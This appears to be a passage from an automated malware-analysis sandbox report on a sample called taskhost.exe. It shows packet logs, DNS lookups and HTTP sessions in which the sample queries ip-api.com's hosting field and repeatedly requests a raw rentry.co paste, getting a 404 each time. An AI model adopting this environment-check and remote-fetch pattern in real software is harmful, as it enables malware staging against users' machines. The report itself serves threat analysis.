                                                              Dec 13, 2024 11:50:06.371035099 CET44349926104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:06.372124910 CET49926443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:06.372155905 CET44349926104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:06.958297968 CET44349926104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:06.958343029 CET44349926104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:06.958431005 CET49926443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:06.958453894 CET44349926104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:06.958466053 CET44349926104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:06.958513021 CET49926443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:06.958518982 CET44349926104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:06.958538055 CET44349926104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:06.958585978 CET49926443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:06.966924906 CET49926443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:09.410356998 CET49937443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:09.410422087 CET44349937104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:09.410520077 CET49937443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:09.410799980 CET49937443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:09.410820007 CET44349937104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:10.622625113 CET44349937104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:10.638628960 CET49937443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:10.638669014 CET44349937104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:11.197565079 CET44349937104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:11.197611094 CET44349937104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:11.197637081 CET44349937104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:11.197658062 CET44349937104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:11.197717905 CET49937443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:11.197727919 CET44349937104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:11.197745085 CET49937443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:11.197767019 CET49937443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:11.221839905 CET49937443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:13.430208921 CET49943443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:13.430246115 CET44349943104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:13.430310011 CET49943443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:13.430689096 CET49943443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:13.430701971 CET44349943104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:14.654103041 CET44349943104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:14.655392885 CET49943443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:14.655422926 CET44349943104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:15.492623091 CET44349943104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:15.492759943 CET44349943104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:15.492852926 CET44349943104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:15.492883921 CET49943443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:15.492927074 CET44349943104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:15.492978096 CET49943443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:15.492988110 CET44349943104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:15.493123055 CET44349943104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:15.493175030 CET49943443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:15.493506908 CET49943443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:17.471966028 CET49954443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:17.472016096 CET44349954104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:17.472100019 CET49954443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:17.472313881 CET49954443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:17.472327948 CET44349954104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:18.703306913 CET44349954104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:18.704793930 CET49954443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:18.704827070 CET44349954104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:19.270010948 CET44349954104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:19.270142078 CET44349954104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:19.270194054 CET49954443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:19.270207882 CET44349954104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:19.270287037 CET44349954104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:19.270332098 CET49954443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:19.270337105 CET44349954104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:19.270493031 CET44349954104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:19.270548105 CET49954443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:19.270812035 CET49954443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:21.050040007 CET49965443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:21.050086975 CET44349965104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:21.050183058 CET49965443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:21.050494909 CET49965443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:21.050504923 CET44349965104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:22.264451027 CET44349965104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:22.266036034 CET49965443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:22.266077042 CET44349965104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:23.074033022 CET44349965104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:23.074081898 CET44349965104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:23.074146986 CET49965443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:23.074187040 CET44349965104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:23.074361086 CET44349965104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:23.074395895 CET49965443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:23.074403048 CET44349965104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:23.074455976 CET44349965104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:23.074500084 CET49965443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:23.074815989 CET49965443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:24.684806108 CET49976443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:24.684864998 CET44349976104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:24.684983969 CET49976443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:24.685247898 CET49976443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:24.685261965 CET44349976104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:25.909727097 CET44349976104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:25.957062960 CET49976443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:25.978838921 CET49976443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:25.978877068 CET44349976104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:26.711767912 CET44349976104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:26.711822987 CET44349976104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:26.711973906 CET44349976104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:26.712006092 CET44349976104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:26.712033033 CET49976443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:26.712054014 CET44349976104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:26.712095022 CET49976443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:26.712114096 CET44349976104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:26.715708017 CET49976443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:26.716751099 CET49976443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:28.159333944 CET49982443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:28.159444094 CET44349982104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:28.159727097 CET49982443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:28.160027981 CET49982443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:28.160059929 CET44349982104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:29.518069983 CET44349982104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:29.564532042 CET49982443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:29.564856052 CET49982443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:29.564870119 CET44349982104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:30.307090044 CET44349982104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:30.307167053 CET44349982104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:30.307203054 CET44349982104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:30.307229042 CET44349982104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:30.307251930 CET49982443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:30.307329893 CET44349982104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:30.307368040 CET44349982104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:30.307388067 CET49982443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:30.307418108 CET49982443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:30.311434984 CET49982443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:31.612425089 CET49992443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:31.612495899 CET44349992104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:31.612646103 CET49992443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:31.612910032 CET49992443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:31.612924099 CET44349992104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:32.823206902 CET44349992104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:32.824558973 CET49992443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:32.824585915 CET44349992104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:33.392554998 CET44349992104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:33.392605066 CET44349992104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:33.392679930 CET49992443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:33.392734051 CET44349992104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:33.392767906 CET44349992104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:33.392817020 CET49992443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:33.392823935 CET44349992104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:33.392848015 CET44349992104.26.2.16192.168.2.7
                                                              Dec 13, 2024 11:50:33.392891884 CET49992443192.168.2.7104.26.2.16
                                                              Dec 13, 2024 11:50:34.552671909 CET49992443192.168.2.7104.26.2.16

                                                              UDP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Dec 13, 2024 11:48:28.755964994 CET5580953192.168.2.71.1.1.1
                                                              Dec 13, 2024 11:48:28.896393061 CET53558091.1.1.1192.168.2.7
                                                              Dec 13, 2024 11:48:59.502892971 CET5429753192.168.2.71.1.1.1
                                                              Dec 13, 2024 11:48:59.718101978 CET53542971.1.1.1192.168.2.7

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Dec 13, 2024 11:48:28.755964994 CET192.168.2.71.1.1.10xe416Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                              Dec 13, 2024 11:48:59.502892971 CET192.168.2.71.1.1.10xd2Standard query (0)rentry.coA (IP address)IN (0x0001)false

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Dec 13, 2024 11:48:28.896393061 CET1.1.1.1192.168.2.70xe416No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                              Dec 13, 2024 11:48:59.718101978 CET1.1.1.1192.168.2.70xd2No error (0)rentry.co104.26.2.16A (IP address)IN (0x0001)false
                                                              Dec 13, 2024 11:48:59.718101978 CET1.1.1.1192.168.2.70xd2No error (0)rentry.co172.67.75.40A (IP address)IN (0x0001)false
                                                              Dec 13, 2024 11:48:59.718101978 CET1.1.1.1192.168.2.70xd2No error (0)rentry.co104.26.3.16A (IP address)IN (0x0001)false

                                                              HTTP Request Dependency Graph

                                                              • rentry.co
                                                              • ip-api.com

                                                              HTTP Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.749701208.95.112.1806504C:\Users\user\Desktop\taskhost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 11:48:29.031506062 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                              Host: ip-api.com
                                                              Connection: Keep-Alive
                                                              Dec 13, 2024 11:48:30.126492023 CET175INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 10:48:29 GMT
                                                              Content-Type: text/plain; charset=utf-8
                                                              Content-Length: 6
                                                              Access-Control-Allow-Origin: *
                                                              X-Ttl: 60
                                                              X-Rl: 44
                                                              Data Raw: 66 61 6c 73 65 0a
                                                              Data Ascii: false


                                                              HTTPS Proxied Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.749762104.26.2.164436504C:\Users\user\Desktop\taskhost.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-13 10:49:01 UTC71OUTGET /ue6sxoup/raw HTTP/1.1
                                                              Host: rentry.co
                                                              Connection: Keep-Alive
                                                              2024-12-13 10:49:02 UTC874INHTTP/1.1 404 Not Found
                                                              Date: Fri, 13 Dec 2024 10:49:01 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              vary: Origin
                                                              x-xss-protection: 1; mode=block
                                                              strict-transport-security: max-age=31536000; includeSubDomains
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yJCzXQ3zkby6SjutzzLQIApXZWRP%2FCa6jcqFt0V5MnWYnRIo5UxaE7UMm%2BaqWe%2Ft1j7p20ZbQ8bwdUze3xLibvlTPoxcwq%2BeYrEqUfNWCHX0f5gSV%2BwxE4C9NA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8f1562988ccec356-EWR
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1680&min_rtt=1678&rtt_var=634&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2817&recv_bytes=685&delivery_rate=1717647&cwnd=153&unsent_bytes=0&cid=23b471d515436138&ts=1094&x=0"
                                                              2024-12-13 10:49:02 UTC495INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                              Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                              2024-12-13 10:49:02 UTC1369INData Raw: 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 73 69 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 40 72 65 6e 74 72 79 5f 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 73 74 61 74 69 63 2f 69 63 6f 6e 73 2f 35 31 32 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f
                                                              Data Ascii: <meta name="twitter:title" content="Rentry.co - Markdown Paste" /> <meta name="twitter:site" content="@rentry_co" /> <meta name="twitter:image" content="https://rentry.co/static/icons/512.png" /> <meta property="og:url" content="https://
                                                              2024-12-13 10:49:02 UTC1369INData Raw: 29 2e 6d 61 74 63 68 65 73 20 7c 7c 20 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 22 64 61 72 6b 2d 6d 6f 64 65 22 29 20 3d 3d 20 22 74 72 75 65 22 29 29 3b 3c 2f 73 63 72 69 70 74 3e 2d 2d 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 63 6f 6e 73 74 20 73 63 72 69 70 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 20 63 6f 6e 73 74 20 68 6e 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 20 3d 3d 3d 20 27 72 65 6e 74 72 79 2e 6f 72 67 27 20 26 26 20 27 72 65 6e 74 72 79 2e 6f 72 67 27 20 7c 7c 20 27 72 65 6e 74 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62
                                                              Data Ascii: ).matches || localStorage.getItem("dark-mode") == "true"));</script>--> <script>const script = document.createElement("script"); const hn = window.location.hostname === 'rentry.org' && 'rentry.org' || 'rentry.co'; script.defer = true; script.setAttrib
                                                              2024-12-13 10:49:02 UTC1227INData Raw: 74 20 6d 6f 64 65 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20
                                                              Data Ascii: t mode"></span></div> </div> </div> </div> <script src="/static/js/jquery.min.js?vsson=28"></script> <script src="/static/js/bootstrap.min.js?vsson=28"></script>
                                                              2024-12-13 10:49:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.749773104.26.2.164436504C:\Users\user\Desktop\taskhost.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-13 10:49:06 UTC71OUTGET /ue6sxoup/raw HTTP/1.1
                                                              Host: rentry.co
                                                              Connection: Keep-Alive
                                                              2024-12-13 10:49:07 UTC869INHTTP/1.1 404 Not Found
                                                              Date: Fri, 13 Dec 2024 10:49:06 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              vary: Origin
                                                              x-xss-protection: 1; mode=block
                                                              strict-transport-security: max-age=31536000; includeSubDomains
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nqh2ifxraV2eHphC0rz5C0RqucWc9os%2BdLQOeG2y8rdHr9520zOcF1Cduo4SU4LgkZ7CCuF%2BMP6obT5hh5IKslKipym7ZERLDu5%2Fpa2T3HlHkqaSzU520Khhmg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8f1562b7ffda1a44-EWR
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1881&min_rtt=1881&rtt_var=706&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2817&recv_bytes=685&delivery_rate=1549071&cwnd=128&unsent_bytes=0&cid=adc4055d90e59e5e&ts=797&x=0"
                                                              2024-12-13 10:49:07 UTC500INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                              Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                              2024-12-13 10:49:07 UTC1369INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 73 69 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 40 72 65 6e 74 72 79 5f 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 73 74 61 74 69 63 2f 69 63 6f 6e 73 2f 35 31 32 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72
                                                              Data Ascii: <meta name="twitter:title" content="Rentry.co - Markdown Paste" /> <meta name="twitter:site" content="@rentry_co" /> <meta name="twitter:image" content="https://rentry.co/static/icons/512.png" /> <meta property="og:url" content="https://rentr
                                                              2024-12-13 10:49:07 UTC1369INData Raw: 63 68 65 73 20 7c 7c 20 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 22 64 61 72 6b 2d 6d 6f 64 65 22 29 20 3d 3d 20 22 74 72 75 65 22 29 29 3b 3c 2f 73 63 72 69 70 74 3e 2d 2d 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 63 6f 6e 73 74 20 73 63 72 69 70 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 20 63 6f 6e 73 74 20 68 6e 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 20 3d 3d 3d 20 27 72 65 6e 74 72 79 2e 6f 72 67 27 20 26 26 20 27 72 65 6e 74 72 79 2e 6f 72 67 27 20 7c 7c 20 27 72 65 6e 74 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27
                                                              Data Ascii: ches || localStorage.getItem("dark-mode") == "true"));</script>--> <script>const script = document.createElement("script"); const hn = window.location.hostname === 'rentry.org' && 'rentry.org' || 'rentry.co'; script.defer = true; script.setAttribute('
                                                              2024-12-13 10:49:07 UTC1222INData Raw: 65 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20
                                                              Data Ascii: e"></span></div> </div> </div> </div> <script src="/static/js/jquery.min.js?vsson=28"></script> <script src="/static/js/bootstrap.min.js?vsson=28"></script>
                                                              2024-12-13 10:49:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              2192.168.2.749788104.26.2.164436504C:\Users\user\Desktop\taskhost.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-13 10:49:11 UTC71OUTGET /ue6sxoup/raw HTTP/1.1
                                                              Host: rentry.co
                                                              Connection: Keep-Alive
                                                              2024-12-13 10:49:12 UTC867INHTTP/1.1 404 Not Found
